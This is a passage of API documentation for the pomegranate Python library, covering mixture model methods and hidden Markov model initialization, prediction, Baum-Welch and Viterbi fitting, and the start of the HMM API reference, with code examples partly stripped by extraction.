0.93662106]])\n>>> clf.fit([, , , , ])\n>>> clf.predict_proba([, , ])\narray([[ 1. , 0. ],\n[ 1. , 0. ],\n[ 0.00004383, 0.99995617]])\n>>> clf.distributions\narray([ {\n\"frozen\" :false,\n\"class\" :\"Distribution\",\n\"parameters\" :[\n6.6571359101390755,\n1.2639830514274502\n],\n\"name\" :\"NormalDistribution\"\n},\n{\n\"frozen\" :false,\n\"class\" :\"Distribution\",\n\"parameters\" :[\n1.498707696758334,\n0.4999983303277837\n],\n\"name\" :\"NormalDistribution\"\n}], dtype=object)\n\nAttributes: distributions : array-like, shape (n_components,) The component distribution objects. weights : array-like, shape (n_components,) The learned prior weight of each object\nclear_summaries()\n\nRemove the stored sufficient statistics.\n\nParameters: None None\ncopy()\n\nReturn a deep copy of this distribution object.\n\nThis object will not be tied to any other distribution or connected in any form.\n\nParameters: None distribution : Distribution A copy of the distribution with the same parameters.\nfit()\n\nFit the model to new data using EM.\n\nThis method fits the components of the model to new data using the EM method. It will iterate until either max iterations has been reached, or the stop threshold has been passed.\n\nParameters: X : array-like or generator, shape (n_samples, n_dimensions) This is the data to train on. Each row is a sample, and each column is a dimension to train on. weights : array-like, shape (n_samples,), optional The initial weights of each sample in the matrix. If nothing is passed in then each sample is assumed to be the same weight. Default is None. inertia : double, optional The weight of the previous parameters of the model. The new parameters will roughly be old_param*inertia + new_param*(1-inertia), so an inertia of 0 means ignore the old parameters, whereas an inertia of 1 means ignore the new parameters. Default is 0.0. pseudocount : double, optional, positive A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Only effects mixture models defined over discrete distributions. Default is 0. stop_threshold : double, optional, positive The threshold at which EM will terminate for the improvement of the model. If the model does not improve its fit of the data by a log probability of 0.1 then terminate. Default is 0.1. max_iterations : int, optional, positive The maximum number of iterations to run EM for. If this limit is hit then it will terminate training, regardless of how well the model is improving per iteration. Default is 1e8. batch_size : int or None, optional The number of samples in a batch to summarize on. This controls the size of the set sent to summarize and so does not make the update any less exact. This is useful when training on a memory map and cannot load all the data into memory. If set to None, batch_size is 1 / n_jobs. Default is None. batches_per_epoch : int or None, optional The number of batches in an epoch. This is the number of batches to summarize before calling from_summaries and updating the model parameters. This allows one to do minibatch updates by updating the model parameters before setting the full dataset. If set to None, uses the full dataset. Default is None. lr_decay : double, optional, positive The step size decay as a function of the number of iterations. Functionally, this sets the inertia to be (2+k)^{-lr_decay} where k is the number of iterations. This causes initial iterations to have more of an impact than later iterations, and is frequently used in minibatch learning. This value is suggested to be between 0.5 and 1. Default is 0, meaning no decay. callbacks : list, optional A list of callback objects that describe functionality that should be undertaken over the course of training. return_history : bool, optional Whether to return the history during training as well as the model. verbose : bool, optional Whether or not to print out improvement information over iterations. Default is False. n_jobs : int, optional The number of threads to use when parallelizing the job. This parameter is passed directly into joblib. Default is 1, indicating no parallelism. self : GeneralMixtureModel The fit mixture model.\nfreeze()\n\nFreeze the distribution, preventing updates from occurring.\n\nfrom_samples()\n\nCreate a mixture model directly from the given dataset.\n\nFirst, k-means will be run using the given initializations, in order to define initial clusters for the points. These clusters are used to initialize the distributions used. Then, EM is run to refine the parameters of these distributions.\n\nA homogeneous mixture can be defined by passing in a single distribution callable as the first parameter and specifying the number of components, while a heterogeneous mixture can be defined by passing in a list of callables of the appropriate type.\n\nParameters: distributions : array-like, shape (n_components,) or callable The components of the model. If array, corresponds to the initial distributions of the components. If callable, must also pass in the number of components and kmeans++ will be used to initialize them. n_components : int If a callable is passed into distributions then this is the number of components to initialize using the kmeans++ algorithm. X : array-like, shape (n_samples, n_dimensions) This is the data to train on. Each row is a sample, and each column is a dimension to train on. weights : array-like, shape (n_samples,), optional The initial weights of each sample in the matrix. If nothing is passed in then each sample is assumed to be the same weight. Default is None. n_init : int, optional The number of initializations of k-means to do before choosing the best. Default is 1. init : str, optional The initialization algorithm to use for the initial k-means clustering. Must be one of ‘first-k’, ‘random’, ‘kmeans++’, or ‘kmeans||’. Default is ‘kmeans++’. max_kmeans_iterations : int, optional The maximum number of iterations to run kmeans for in the initialization step. Default is 1. inertia : double, optional The weight of the previous parameters of the model. The new parameters will roughly be old_param*inertia + new_param*(1-inertia), so an inertia of 0 means ignore the old parameters, whereas an inertia of 1 means ignore the new parameters. Default is 0.0. pseudocount : double, optional, positive A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Only effects mixture models defined over discrete distributions. Default is 0. stop_threshold : double, optional, positive The threshold at which EM will terminate for the improvement of the model. If the model does not improve its fit of the data by a log probability of 0.1 then terminate. Default is 0.1. max_iterations : int, optional, positive The maximum number of iterations to run EM for. If this limit is hit then it will terminate training, regardless of how well the model is improving per iteration. Default is 1e8. batch_size : int or None, optional The number of samples in a batch to summarize on. This controls the size of the set sent to summarize and so does not make the update any less exact. This is useful when training on a memory map and cannot load all the data into memory. If set to None, batch_size is 1 / n_jobs. Default is None. batches_per_epoch : int or None, optional The number of batches in an epoch. This is the number of batches to summarize before calling from_summaries and updating the model parameters. This allows one to do minibatch updates by updating the model parameters before setting the full dataset. If set to None, uses the full dataset. Default is None. lr_decay : double, optional, positive The step size decay as a function of the number of iterations. Functionally, this sets the inertia to be (2+k)^{-lr_decay} where k is the number of iterations. This causes initial iterations to have more of an impact than later iterations, and is frequently used in minibatch learning. This value is suggested to be between 0.5 and 1. Default is 0, meaning no decay. callbacks : list, optional A list of callback objects that describe functionality that should be undertaken over the course of training. return_history : bool, optional Whether to return the history during training as well as the model. verbose : bool, optional Whether or not to print out improvement information over iterations. Default is False. n_jobs : int, optional The number of threads to use when parallelizing the job. This parameter is passed directly into joblib. Default is 1, indicating no parallelism.\nfrom_summaries()\n\nFit the model to the collected sufficient statistics.\n\nFit the parameters of the model to the sufficient statistics gathered during the summarize calls. This should return an exact update.\n\nParameters: inertia : double, optional The weight of the previous parameters of the model. The new parameters will roughly be old_param*inertia + new_param*(1-inertia), so an inertia of 0 means ignore the old parameters, whereas an inertia of 1 means ignore the new parameters. Default is 0.0. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. If discrete data, will smooth both the prior probabilities of each component and the emissions of each component. Otherwise, will only smooth the prior probabilities of each component. Default is 0. None\nfrom_yaml()\n\nDeserialize this object from its YAML representation.\n\nlog_probability()\n\nCalculate the log probability of a point under the distribution.\n\nThe probability of a point is the sum of the probabilities of each distribution multiplied by the weights. Thus, the log probability is the sum of the log probability plus the log prior.\n\nThis is the python interface.\n\nParameters: X : numpy.ndarray, shape=(n, d) or (n, m, d) The samples to calculate the log probability of. Each row is a sample and each column is a dimension. If emissions are HMMs then shape is (n, m, d) where m is variable length for each observation, and X becomes an array of n (m, d)-shaped arrays. n_jobs : int, optional The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. log_probability : double The log probability of the point under the distribution.\npredict()\n\nPredict the most likely component which generated each sample.\n\nCalculate the posterior P(M|D) for each sample and return the index of the component most likely to fit it. This corresponds to a simple argmax over the responsibility matrix.\n\nThis is a sklearn wrapper for the maximum_a_posteriori method.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. y : array-like, shape (n_samples,) The predicted component which fits the sample the best.\npredict_log_proba()\n\nCalculate the posterior log P(M|D) for data.\n\nCalculate the log probability of each item having been generated from each component in the model. This returns normalized log probabilities such that the probabilities should sum to 1\n\nThis is a sklearn wrapper for the original posterior function.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. y : array-like, shape (n_samples, n_components) The normalized log probability log P(M|D) for each sample. This is the probability that the sample was generated from each component.\npredict_proba()\n\nCalculate the posterior P(M|D) for data.\n\nCalculate the probability of each item having been generated from each component in the model. This returns normalized probabilities such that each row should sum to 1.\n\nSince calculating the log probability is much faster, this is just a wrapper which exponentiates the log probability matrix.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. probability : array-like, shape (n_samples, n_components) The normalized probability P(M|D) for each sample. This is the probability that the sample was generated from each component.\nprobability()\n\nReturn the probability of the given symbol under this distribution.\n\nParameters: symbol : object The symbol to calculate the probability of probability : double The probability of that point under the distribution.\nsample()\n\nGenerate a sample from the model.\n\nFirst, randomly select a component weighted by the prior probability, Then, use the sample method from that component to generate a sample.\n\nParameters: n : int, optional The number of samples to generate. Defaults to 1. random_state : int, numpy.random.RandomState, or None The random state used for generating samples. If set to none, a random seed will be used. If set to either an integer or a random seed, will produce deterministic outputs. sample : array-like or object A randomly generated sample from the model of the type modelled by the emissions. An integer if using most distributions, or an array if using multivariate ones, or a string for most discrete distributions. If n=1 return an object, if n>1 return an array of the samples.\nscore()\n\nReturn the accuracy of the model on a data set.\n\nParameters: X : numpy.ndarray, shape=(n, d) The values of the data set y : numpy.ndarray, shape=(n,) The labels of each value\nsummarize()\n\nSummarize a batch of data and store sufficient statistics.\n\nThis will run the expectation step of EM and store sufficient statistics in the appropriate distribution objects. The summarization can be thought of as a chunk of the E step, and the from_summaries method as the M step.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) This is the data to train on. Each row is a sample, and each column is a dimension to train on. weights : array-like, shape (n_samples,), optional The initial weights of each sample in the matrix. If nothing is passed in then each sample is assumed to be the same weight. Default is None. logp : double The log probability of the data given the current model. This is used to speed up EM.\nthaw()\n\nThaw the distribution, re-allowing updates to occur.\n\nto_json()\n\nSerialize the model to JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. Default is (‘,’, ‘ : ‘). indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. Default is 4. json : str A properly formatted JSON object.\nto_yaml()\n\nSerialize the model to YAML for compactness.\n\n## Hidden Markov Models¶\n\nHidden Markov models (HMMs) are a structured probabilistic model that forms a probability distribution of sequences, as opposed to individual symbols. It is similar to a Bayesian network in that it has a directed graphical structure where nodes represent probability distributions, but unlike Bayesian networks in that the edges represent transitions and encode transition probabilities, whereas in Bayesian networks edges encode dependence statements. A HMM can be thought of as a general mixture model plus a transition matrix, where each component in the general Mixture model corresponds to a node in the hidden Markov model, and the transition matrix informs the probability that adjacent symbols in the sequence transition from being generated from one component to another. A strength of HMMs is that they can model variable length sequences whereas other models typically require a fixed feature set. They are extensively used in the fields of natural language processing to model speech, bioinformatics to model biosequences, and robotics to model movement.\n\nThe HMM implementation in pomegranate is based off of the implementation in its predecessor, Yet Another Hidden Markov Model (YAHMM). To convert a script that used YAHMM to a script using pomegranate, you only need to change calls to the Model class to call HiddenMarkovModel. For example, a script that previously looked like the following:\n\n>>> from yahmm import *\n>>> model = Model()\n\n\nwould now be written as\n\n>>> from pomegranate import *\n>>> model = HiddenMarkovModel()\n\n\nand the remaining method calls should be identical.\n\n### Initialization¶\n\nHidden Markov models can be initialized in one of two ways depending on if you know the initial parameters of the model, either (1) by defining both the distributions and the graphical structure manually, or (2) running the from_samples method to learn both the structure and distributions directly from data. The first initialization method can be used either to specify a pre-defined model that is ready to make predictions, or as the initialization to a training algorithm such as Baum-Welch. It is flexible enough to allow sparse transition matrices and any type of distribution on each node, i.e. normal distributions on several nodes, but a mixture of normals on some nodes modeling more complex phenomena. The second initialization method is less flexible, in that currently each node must have the same distribution type, and that it will only learn dense graphs. Similar to mixture models, this initialization method starts with k-means to initialize the distributions and a uniform probability transition matrix before running Baum-Welch.\n\nIf you are initializing the parameters manually, you can do so either by passing in a list of distributions and a transition matrix, or by building the model line-by-line. Let’s first take a look at building the model from a list of distributions and a transition matrix.\n\nfrom pomegranate import *\ndists = [NormalDistribution(5, 1), NormalDistribution(1, 7), NormalDistribution(8,2)]\ntrans_mat = numpy.array([[0.7, 0.3, 0.0],\n[0.0, 0.8, 0.2],\n[0.0, 0.0, 0.9]])\nstarts = numpy.array([1.0, 0.0, 0.0])\nends = numpy.array([0.0, 0.0, 0.1])\nmodel = HiddenMarkovModel.from_matrix(trans_mat, dists, starts, ends)\n\n\nNext, let’s take a look at building the same model line by line.\n\nfrom pomegranate import *\ns1 = State(NormalDistribution(5, 1))\ns2 = State(NormalDistribution(1, 7))\ns3 = State(NormalDistribution(8, 2))\nmodel = HiddenMarkovModel()\nmodel.bake()\n\n\nInitially it may seem that the first method is far easier due to it being fewer lines of code. However, when building large sparse models defining a full transition matrix can be cumbersome, especially when it is mostly 0s.\n\nModels built in this manner must be explicitly “baked” at the end. This finalizes the model topology and creates the internal sparse matrix which makes up the model. This step also automatically normalizes all transitions to make sure they sum to 1.0, stores information about tied distributions, edges, pseudocounts, and merges unnecessary silent states in the model for computational efficiency. This can cause the bake step to take a little bit of time. If you want to reduce this overhead and are sure you specified the model correctly you can pass in merge=”None” to the bake step to avoid model checking.\n\nThe second way to initialize models is to use the from_samples class method. The call is identical to initializing a mixture model.\n\n>>> from pomegranate import *\n>>> model = HiddenMarkovModel.from_samples(NormalDistribution, n_components=5, X=X)\n\n\nMuch like a mixture model, all arguments present in the fit step can also be passed in to this method. Also like a mixture model, it is initialized by running k-means on the concatenation of all data, ignoring that the symbols are part of a structured sequence. The clusters returned are used to initialize all parameters of the distributions, i.e. both mean and covariances for multivariate Gaussian distributions. The transition matrix is initialized as uniform random probabilities. After the components (distributions on the nodes) are initialized, the given training algorithm is used to refine the parameters of the distributions and learn the appropriate transition probabilities.\n\n### Log Probability¶\n\nThere are two common forms of the log probability which are used. The first is the log probability of the most likely path the sequence can take through the model, called the Viterbi probability. This can be calculated using model.viterbi(sequence). However, this is $$P(D|S_{ML}, S_{ML}, S_{ML})$$ not $$P(D|M)$$. In order to get $$P(D|M)$$ we have to sum over all possible paths instead of just the single most likely path. This can be calculated using model.log_probability(sequence) and uses the forward algorithm internally. On that note, the full forward matrix can be returned using model.forward(sequence) and the full backward matrix can be returned using model.backward(sequence), while the full forward-backward emission and transition matrices can be returned using model.forward_backward(sequence).\n\n### Prediction¶\n\nA common prediction technique is calculating the Viterbi path, which is the most likely sequence of states that generated the sequence given the full model. This is solved using a simple dynamic programming algorithm similar to sequence alignment in bioinformatics. This can be called using model.viterbi(sequence). A sklearn wrapper can be called using model.predict(sequence, algorithm='viterbi').\n\nAnother prediction technique is called maximum a posteriori or forward-backward, which uses the forward and backward algorithms to calculate the most likely state per observation in the sequence given the entire remaining alignment. Much like the forward algorithm can calculate the sum-of-all-paths probability instead of the most likely single path, the forward-backward algorithm calculates the best sum-of-all-paths state assignment instead of calculating the single best path. This can be called using model.predict(sequence, algorithm='map') and the raw normalized probability matrices can be called using model.predict_proba(sequence).\n\n### Fitting¶\n\nA simple fitting algorithm for hidden Markov models is called Viterbi training. In this method, each observation is tagged with the most likely state to generate it using the Viterbi algorithm. The distributions (emissions) of each states are then updated using MLE estimates on the observations which were generated from them, and the transition matrix is updated by looking at pairs of adjacent state taggings. This can be done using model.fit(sequence, algorithm='viterbi').\n\nHowever, this is not the best way to do training and much like the other sections there is a way of doing training using sum-of-all-paths probabilities instead of maximally likely path. This is called Baum-Welch or forward-backward training. Instead of using hard assignments based on the Viterbi path, observations are given weights equal to the probability of them having been generated by that state. Weighted MLE can then be done to update the distributions, and the soft transition matrix can give a more precise probability estimate. This is the default training algorithm, and can be called using either model.fit(sequences) or explicitly using model.fit(sequences, algorithm='baum-welch').\n\nFitting in pomegranate also has a number of options, including the use of distribution or edge inertia, freezing certain states, tying distributions or edges, and using pseudocounts. See the tutorial linked to at the top of this page for full details on each of these options.\n\n### API Reference¶\n\nclass pomegranate.hmm.HiddenMarkovModel\n\nA Hidden Markov Model\n\nA Hidden Markov Model (HMM) is a directed graphical model where nodes are hidden states which contain an observed emission distribution and edges contain the probability of transitioning from one hidden state to another. HMMs allow you to tag each observation in a variable length sequence with the most likely hidden state according to the model.\n\nParameters: name : str, optional The name of the model. Default is None. start : State, optional An optional state to force the model to start in. Default is None. end : State, optional An optional state to force the model to end in. Default is None.\n\nExamples\n\n>>> from pomegranate import *\n>>> d1 = DiscreteDistribution({'A' : 0.35, 'C' : 0.20, 'G' : 0.05, 'T' : 0.40})\n>>> d2 = DiscreteDistribution({'A' : 0.25, 'C' : 0.25, 'G' : 0.25, 'T' : 0.25})\n>>> d3 = DiscreteDistribution({'A' : 0.10, 'C' : 0.40, 'G' : 0.40, 'T' : 0.10})\n>>>\n>>> s1 = State(d1, name=\"s1\")\n>>> s2 = State(d2, name=\"s2\")\n>>> s3 = State(d3, name=\"s3\")\n>>>\n>>> model = HiddenMarkovModel('example')\n>>> model.bake()\n>>>\n>>> print(model.log_probability(list('ACGACTATTCGAT')))\n-22.73896159971087\n>>> print(\", \".join(state.name for i, state in model.viterbi(list('ACGACTATTCGAT'))))\nexample-start, s1, s2, s2, s2, s2, s2, s2, s2, s2, s2, s2, s2, s3, example-end\n\nAttributes: start : State A state object corresponding to the initial start of the model end : State A state object corresponding to the forced end of the model start_index : int The index of the start object in the state list end_index : int The index of the end object in the state list silent_start : int The index of the beginning of the silent states in the state list states : list The list of all states in the model, with silent states at the end\nadd_edge()\n\nAdd a transition from state a to state b which indicates that B is dependent on A in ways specified by the distribution.\n\nadd_model()\n\nAdd the states and edges of another model to this model.\n\nParameters: other : HiddenMarkovModel The other model to add None\nadd_node()\n\nAdd a node to the graph.\n\nadd_nodes()\n\nAdd multiple states to the graph.\n\nadd_state()\n\nAdd a state to the given model.\n\nThe state must not already be in the model, nor may it be part of any other model that will eventually be combined with this one.\n\nParameters: state : State A state object to be added to the model. None\nadd_states()\n\nAdd multiple states to the model at the same time.\n\nParameters: states : list or generator Either a list of states which are entered sequentially, or just comma separated values, for example model.add_states(a, b, c, d). None\nadd_transition()\n\nAdd a transition from state a to state b.\n\nAdd a transition from state a to state b with the given (non-log) probability. Both states must be in the HMM already. self.start and self.end are valid arguments here. Probabilities will be normalized such that every node has edges summing to 1. leaving that node, but only when the model is baked. Psueodocounts are allowed as a way of using edge-specific pseudocounts for training.\n\nBy specifying a group as a string, you can tie edges together by giving them the same group. This means that a transition across one edge in the group counts as a transition across all edges in terms of training.\n\nParameters: a : State The state that the edge originates from b : State The state that the edge goes to probability : double The probability of transitioning from state a to state b in [0, 1] pseudocount : double, optional The pseudocount to use for this specific edge if using edge pseudocounts for training. Defaults to the probability. Default is None. group : str, optional The name of the group of edges to tie together during training. If groups are used, then a transition across any one edge counts as a transition across all edges. Default is None. None\nadd_transitions()\n\nAdd many transitions at the same time,\n\nParameters: a : State or list Either a state or a list of states where the edges originate. b : State or list Either a state or a list of states where the edges go to. probabilities : list The probabilities associated with each transition. pseudocounts : list, optional The pseudocounts associated with each transition. Default is None. groups : list, optional The groups of each edge. Default is None. None\n\nExamples\n\n>>> model.add_transitions([model.start, s1], [s1, model.end], [1., 1.])\n>>> model.add_transitions([model.start, s1, s2, s3], s4, [0.2, 0.4, 0.3, 0.9])\n>>> model.add_transitions(model.start, [s1, s2, s3], [0.6, 0.2, 0.05])\n\nbackward()\n\nRun the backward algorithm on the sequence.\n\nCalculate the probability of each observation being aligned to each state by going backward through a sequence. Returns the full backward matrix. Each index i, j corresponds to the sum-of-all-paths log probability of starting at the end of the sequence, and aligning observations to hidden states in such a manner that observation i was aligned to hidden state j. Uses row normalization to dynamically scale each row to prevent underflow errors.\n\nIf the sequence is impossible, will return a matrix of nans.\n\n• Silent state handling taken from p. 71 of “Biological\n\nSequence Analysis” by Durbin et al., and works for anything which does not have loops of silent states.\n\n• Row normalization technique explained by\nParameters: sequence : array-like An array (or list) of observations. matrix : array-like, shape (len(sequence), n_states) The probability of aligning the sequences to states in a backward fashion.\nbake()\n\nFinalize the topology of the model.\n\nFinalize the topology of the model and assign a numerical index to every state. This method must be called before any of the probability- calculating methods.\n\nThis fills in self.states (a list of all states in order) and self.transition_log_probabilities (log probabilities for transitions), as well as self.start_index and self.end_index, and self.silent_start (the index of the first silent state).\n\nParameters: verbose : bool, optional Return a log of changes made to the model during normalization or merging. Default is False. merge : “None”, “Partial, “All” Merging has three options: “None”: No modifications will be made to the model. “Partial”: A silent state which only has a probability 1 transition to another silent state will be merged with that silent state. This means that if silent state “S1” has a single transition to silent state “S2”, that all transitions to S1 will now go to S2, with the same probability as before, and S1 will be removed from the model. “All”: A silent state with a probability 1 transition to any other state, silent or symbol emitting, will be merged in the manner described above. In addition, any orphan states will be removed from the model. An orphan state is a state which does not have any transitions to it OR does not have any transitions from it, except for the start and end of the model. This will iteratively remove orphan chains from the model. This is sometimes desirable, as all states should have both a transition in to get to that state, and a transition out, even if it is only to itself. If the state does not have either, the HMM will likely not work as intended. Default is ‘All’. None\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\nParameters: None None\nconcatenate()\n\nConcatenate this model to another model.\n\nConcatenate this model to another model in such a way that a single probability 1 edge is added between self.end and other.start. Rename all other states appropriately by adding a suffix or prefix if needed.\n\nParameters: other : HiddenMarkovModel The other model to concatenate suffix : str, optional Add the suffix to the end of all state names in the other model. Default is ‘’. prefix : str, optional Add the prefix to the beginning of all state names in the other model. Default is ‘’. None\ncopy()\n\nReturns a deep copy of the HMM.\n\nParameters: None model : HiddenMarkovModel A deep copy of the model with entirely new objects.\ndense_transition_matrix()\n\nReturns the dense transition matrix.\n\nParameters: None matrix : numpy.ndarray, shape (n_states, n_states) A dense transition matrix, containing the log probability of transitioning from each state to each other state.\nedge_count()\n\nReturns the number of edges present in the model.\n\nfit()\n\nFit the model to data using either Baum-Welch, Viterbi, or supervised training.\n\nGiven a list of sequences, performs re-estimation on the model parameters. The two supported algorithms are “baum-welch”, “viterbi”, and “labeled”, indicating their respective algorithm. “labeled” corresponds to supervised learning that requires passing in a matching list of labels for each symbol seen in the sequences.\n\nTraining supports a wide variety of other options including using edge pseudocounts and either edge or distribution inertia.\n\nParameters: sequences : array-like An array of some sort (list, numpy.ndarray, tuple..) of sequences, where each sequence is a numpy array, which is 1 dimensional if the HMM is a one dimensional array, or multidimensional if the HMM supports multiple dimensions. weights : array-like or None, optional An array of weights, one for each sequence to train on. If None, all sequences are equally weighted. Default is None. labels : array-like or None, optional An array of state labels for each sequence. This is only used in ‘labeled’ training. If used this must be comprised of n lists where n is the number of sequences to train on, and each of those lists must have one label per observation. A None in this list corresponds to no labels for the entire sequence and triggers semi-supervised learning, where the labeled sequences are summarized using labeled fitting and the unlabeled are summarized using the specified algorithm. Default is None. stop_threshold : double, optional The threshold the improvement ratio of the models log probability in fitting the scores. Default is 1e-9. min_iterations : int, optional The minimum number of iterations to run Baum-Welch training for. Default is 0. max_iterations : int, optional The maximum number of iterations to run Baum-Welch training for. Default is 1e8. algorithm : ‘baum-welch’, ‘viterbi’, ‘labeled’ The training algorithm to use. Baum-Welch uses the forward-backward algorithm to train using a version of structured EM. Viterbi iteratively runs the sequences through the Viterbi algorithm and then uses hard assignments of observations to states using that. Default is ‘baum-welch’. Labeled training requires that labels are provided for each observation in each sequence. pseudocount : double, optional A pseudocount to add to both transitions and emissions. If supplied, it will override both transition_pseudocount and emission_pseudocount in the same way that specifying inertia will override both edge_inertia and distribution_inertia. Default is None. transition_pseudocount : double, optional A pseudocount to add to all transitions to add a prior to the MLE estimate of the transition probability. Default is 0. emission_pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Only effects hidden Markov models defined over discrete distributions. Default is 0. use_pseudocount : bool, optional Whether to use the pseudocounts defined in the add_edge method for edge-specific pseudocounts when updating the transition probability parameters. Does not effect the transition_pseudocount and emission_pseudocount parameters, but can be used in addition to them. Default is False. inertia : double or None, optional, range [0, 1] If double, will set both edge_inertia and distribution_inertia to be that value. If None, will not override those values. Default is None. edge_inertia : bool, optional, range [0, 1] Whether to use inertia when updating the transition probability parameters. Default is 0.0. distribution_inertia : double, optional, range [0, 1] Whether to use inertia when updating the distribution parameters. Default is 0.0. batches_per_epoch : int or None, optional The number of batches in an epoch. This is the number of batches to summarize before calling from_summaries and updating the model parameters. This allows one to do minibatch updates by updating the model parameters before setting the full dataset. If set to None, uses the full dataset. Default is None. lr_decay : double, optional, positive The step size decay as a function of the number of iterations. Functionally, this sets the inertia to be (2+k)^{-lr_decay} where k is the number of iterations. This causes initial iterations to have more of an impact than later iterations, and is frequently used in minibatch learning. This value is suggested to be between 0.5 and 1. Default is 0, meaning no decay. callbacks : list, optional A list of callback objects that describe functionality that should be undertaken over the course of training. return_history : bool, optional Whether to return the history during training as well as the model. verbose : bool, optional Whether to print the improvement in the model fitting at each iteration. Default is True. n_jobs : int, optional The number of threads to use when performing training. This leads to exact updates. Default is 1. improvement : double The total improvement in fitting the model to the data\nforward()\n\nRun the forward algorithm on the sequence.\n\nCalculate the probability of each observation being aligned to each state by going forward through a sequence. Returns the full forward matrix. Each index i, j corresponds to the sum-of-all-paths log probability of starting at the beginning of the sequence, and aligning observations to hidden states in such a manner that observation i was aligned to hidden state j. Uses row normalization to dynamically scale each row to prevent underflow errors.\n\nIf the sequence is impossible, will return a matrix of nans.\n\n• Silent state handling taken from p. 71 of “Biological\n\nSequence Analysis” by Durbin et al., and works for anything which does not have loops of silent states.\n\n• Row normalization technique explained by\nParameters: sequence : array-like An array (or list) of observations. matrix : array-like, shape (len(sequence), n_states) The probability of aligning the sequences to states in a forward fashion.\nforward_backward()\n\nRun the forward-backward algorithm on the sequence.\n\nThis algorithm returns an emission matrix and a transition matrix. The emission matrix returns the normalized probability that each each state generated that emission given both the symbol and the entire sequence. The transition matrix returns the expected number of times that a transition is used.\n\nIf the sequence is impossible, will return (None, None)\n\n• Forward and backward algorithm implementations. A comprehensive\n\ndescription of the forward, backward, and forward-background algorithm is here: http://en.wikipedia.org/wiki/Forward%E2%80%93backward_algorithm\n\nParameters: sequence : array-like An array (or list) of observations. emissions : array-like, shape (len(sequence), n_nonsilent_states) The normalized probabilities of each state generating each emission. transitions : array-like, shape (n_states, n_states) The expected number of transitions across each edge in the model.\nfreeze()\n\nFreeze the distribution, preventing updates from occurring.\n\nfreeze_distributions()\n\nFreeze all the distributions in model.\n\nUpon training only edges will be updated. The parameters of distributions will not be affected.\n\nParameters: None None\nfrom_json()\n\nRead in a serialized model and return the appropriate classifier.\n\nParameters: s : str A JSON formatted string containing the file. Returns ——- model : object A properly initialized and baked model.\nfrom_matrix()\n\nCreate a model from a more standard matrix format.\n\nTake in a 2D matrix of floats of size n by n, which are the transition probabilities to go from any state to any other state. May also take in a list of length n representing the names of these nodes, and a model name. Must provide the matrix, and a list of size n representing the distribution you wish to use for that state, a list of size n indicating the probability of starting in a state, and a list of size n indicating the probability of ending in a state.\n\nParameters: transition_probabilities : array-like, shape (n_states, n_states) The probabilities of each state transitioning to each other state. distributions : array-like, shape (n_states) The distributions for each state. Silent states are indicated by using None instead of a distribution object. starts : array-like, shape (n_states) The probabilities of starting in each of the states. ends : array-like, shape (n_states), optional If passed in, the probabilities of ending in each of the states. If ends is None, then assumes the model has no explicit end state. Default is None. state_names : array-like, shape (n_states), optional The name of the states. If None is passed in, default names are generated. Default is None name : str, optional The name of the model. Default is None verbose : bool, optional The verbose parameter for the underlying bake method. Default is False. merge : ‘None’, ‘Partial’, ‘All’, optional The merge parameter for the underlying bake method. Default is All model : HiddenMarkovModel The baked model ready to go.\n\nExamples\n\nmatrix = [[0.4, 0.5], [0.4, 0.5]] distributions = [NormalDistribution(1, .5), NormalDistribution(5, 2)] starts = [1., 0.] ends = [.1., .1] state_names= [“A”, “B”]\n\nmodel = Model.from_matrix(matrix, distributions, starts, ends,\nstate_names, name=”test_model”)\nfrom_samples()\n\nLearn the transitions and emissions of a model directly from data.\n\nThis method will learn both the transition matrix, emission distributions, and start probabilities for each state. This will only return a dense graph without any silent states or explicit transitions to an end state. Currently all components must be defined as the same distribution, but soon this restriction will be removed.\n\nIf learning a multinomial HMM over discrete characters, the initial emisison probabilities are initialized randomly. If learning a continuous valued HMM, such as a Gaussian HMM, then kmeans clustering is used first to identify initial clusters.\n\nRegardless of the type of model, the transition matrix and start probabilities are initialized uniformly. Then the specified learning algorithm (Baum-Welch recommended) is used to refine the parameters of the model.\n\nParameters: distribution : callable The emission distribution of the components of the model. n_components : int The number of states (or components) to initialize. X : array-like or generator An array of some sort (list, numpy.ndarray, tuple..) of sequences, where each sequence is a numpy array, which is 1 dimensional if the HMM is a one dimensional array, or multidimensional if the HMM supports multiple dimensions. Alternatively, a data generator object that yields sequences. weights : array-like or None, optional An array of weights, one for each sequence to train on. If None, all sequences are equally weighted. Default is None. labels : array-like or None, optional An array of state labels for each sequence. This is only used in ‘labeled’ training. If used this must be comprised of n lists where n is the number of sequences to train on, and each of those lists must have one label per observation. A None in this list corresponds to no labels for the entire sequence and triggers semi-supervised learning, where the labeled sequences are summarized using labeled fitting and the unlabeled are summarized using the specified algorithm. Default is None. algorithm : ‘baum-welch’, ‘viterbi’, 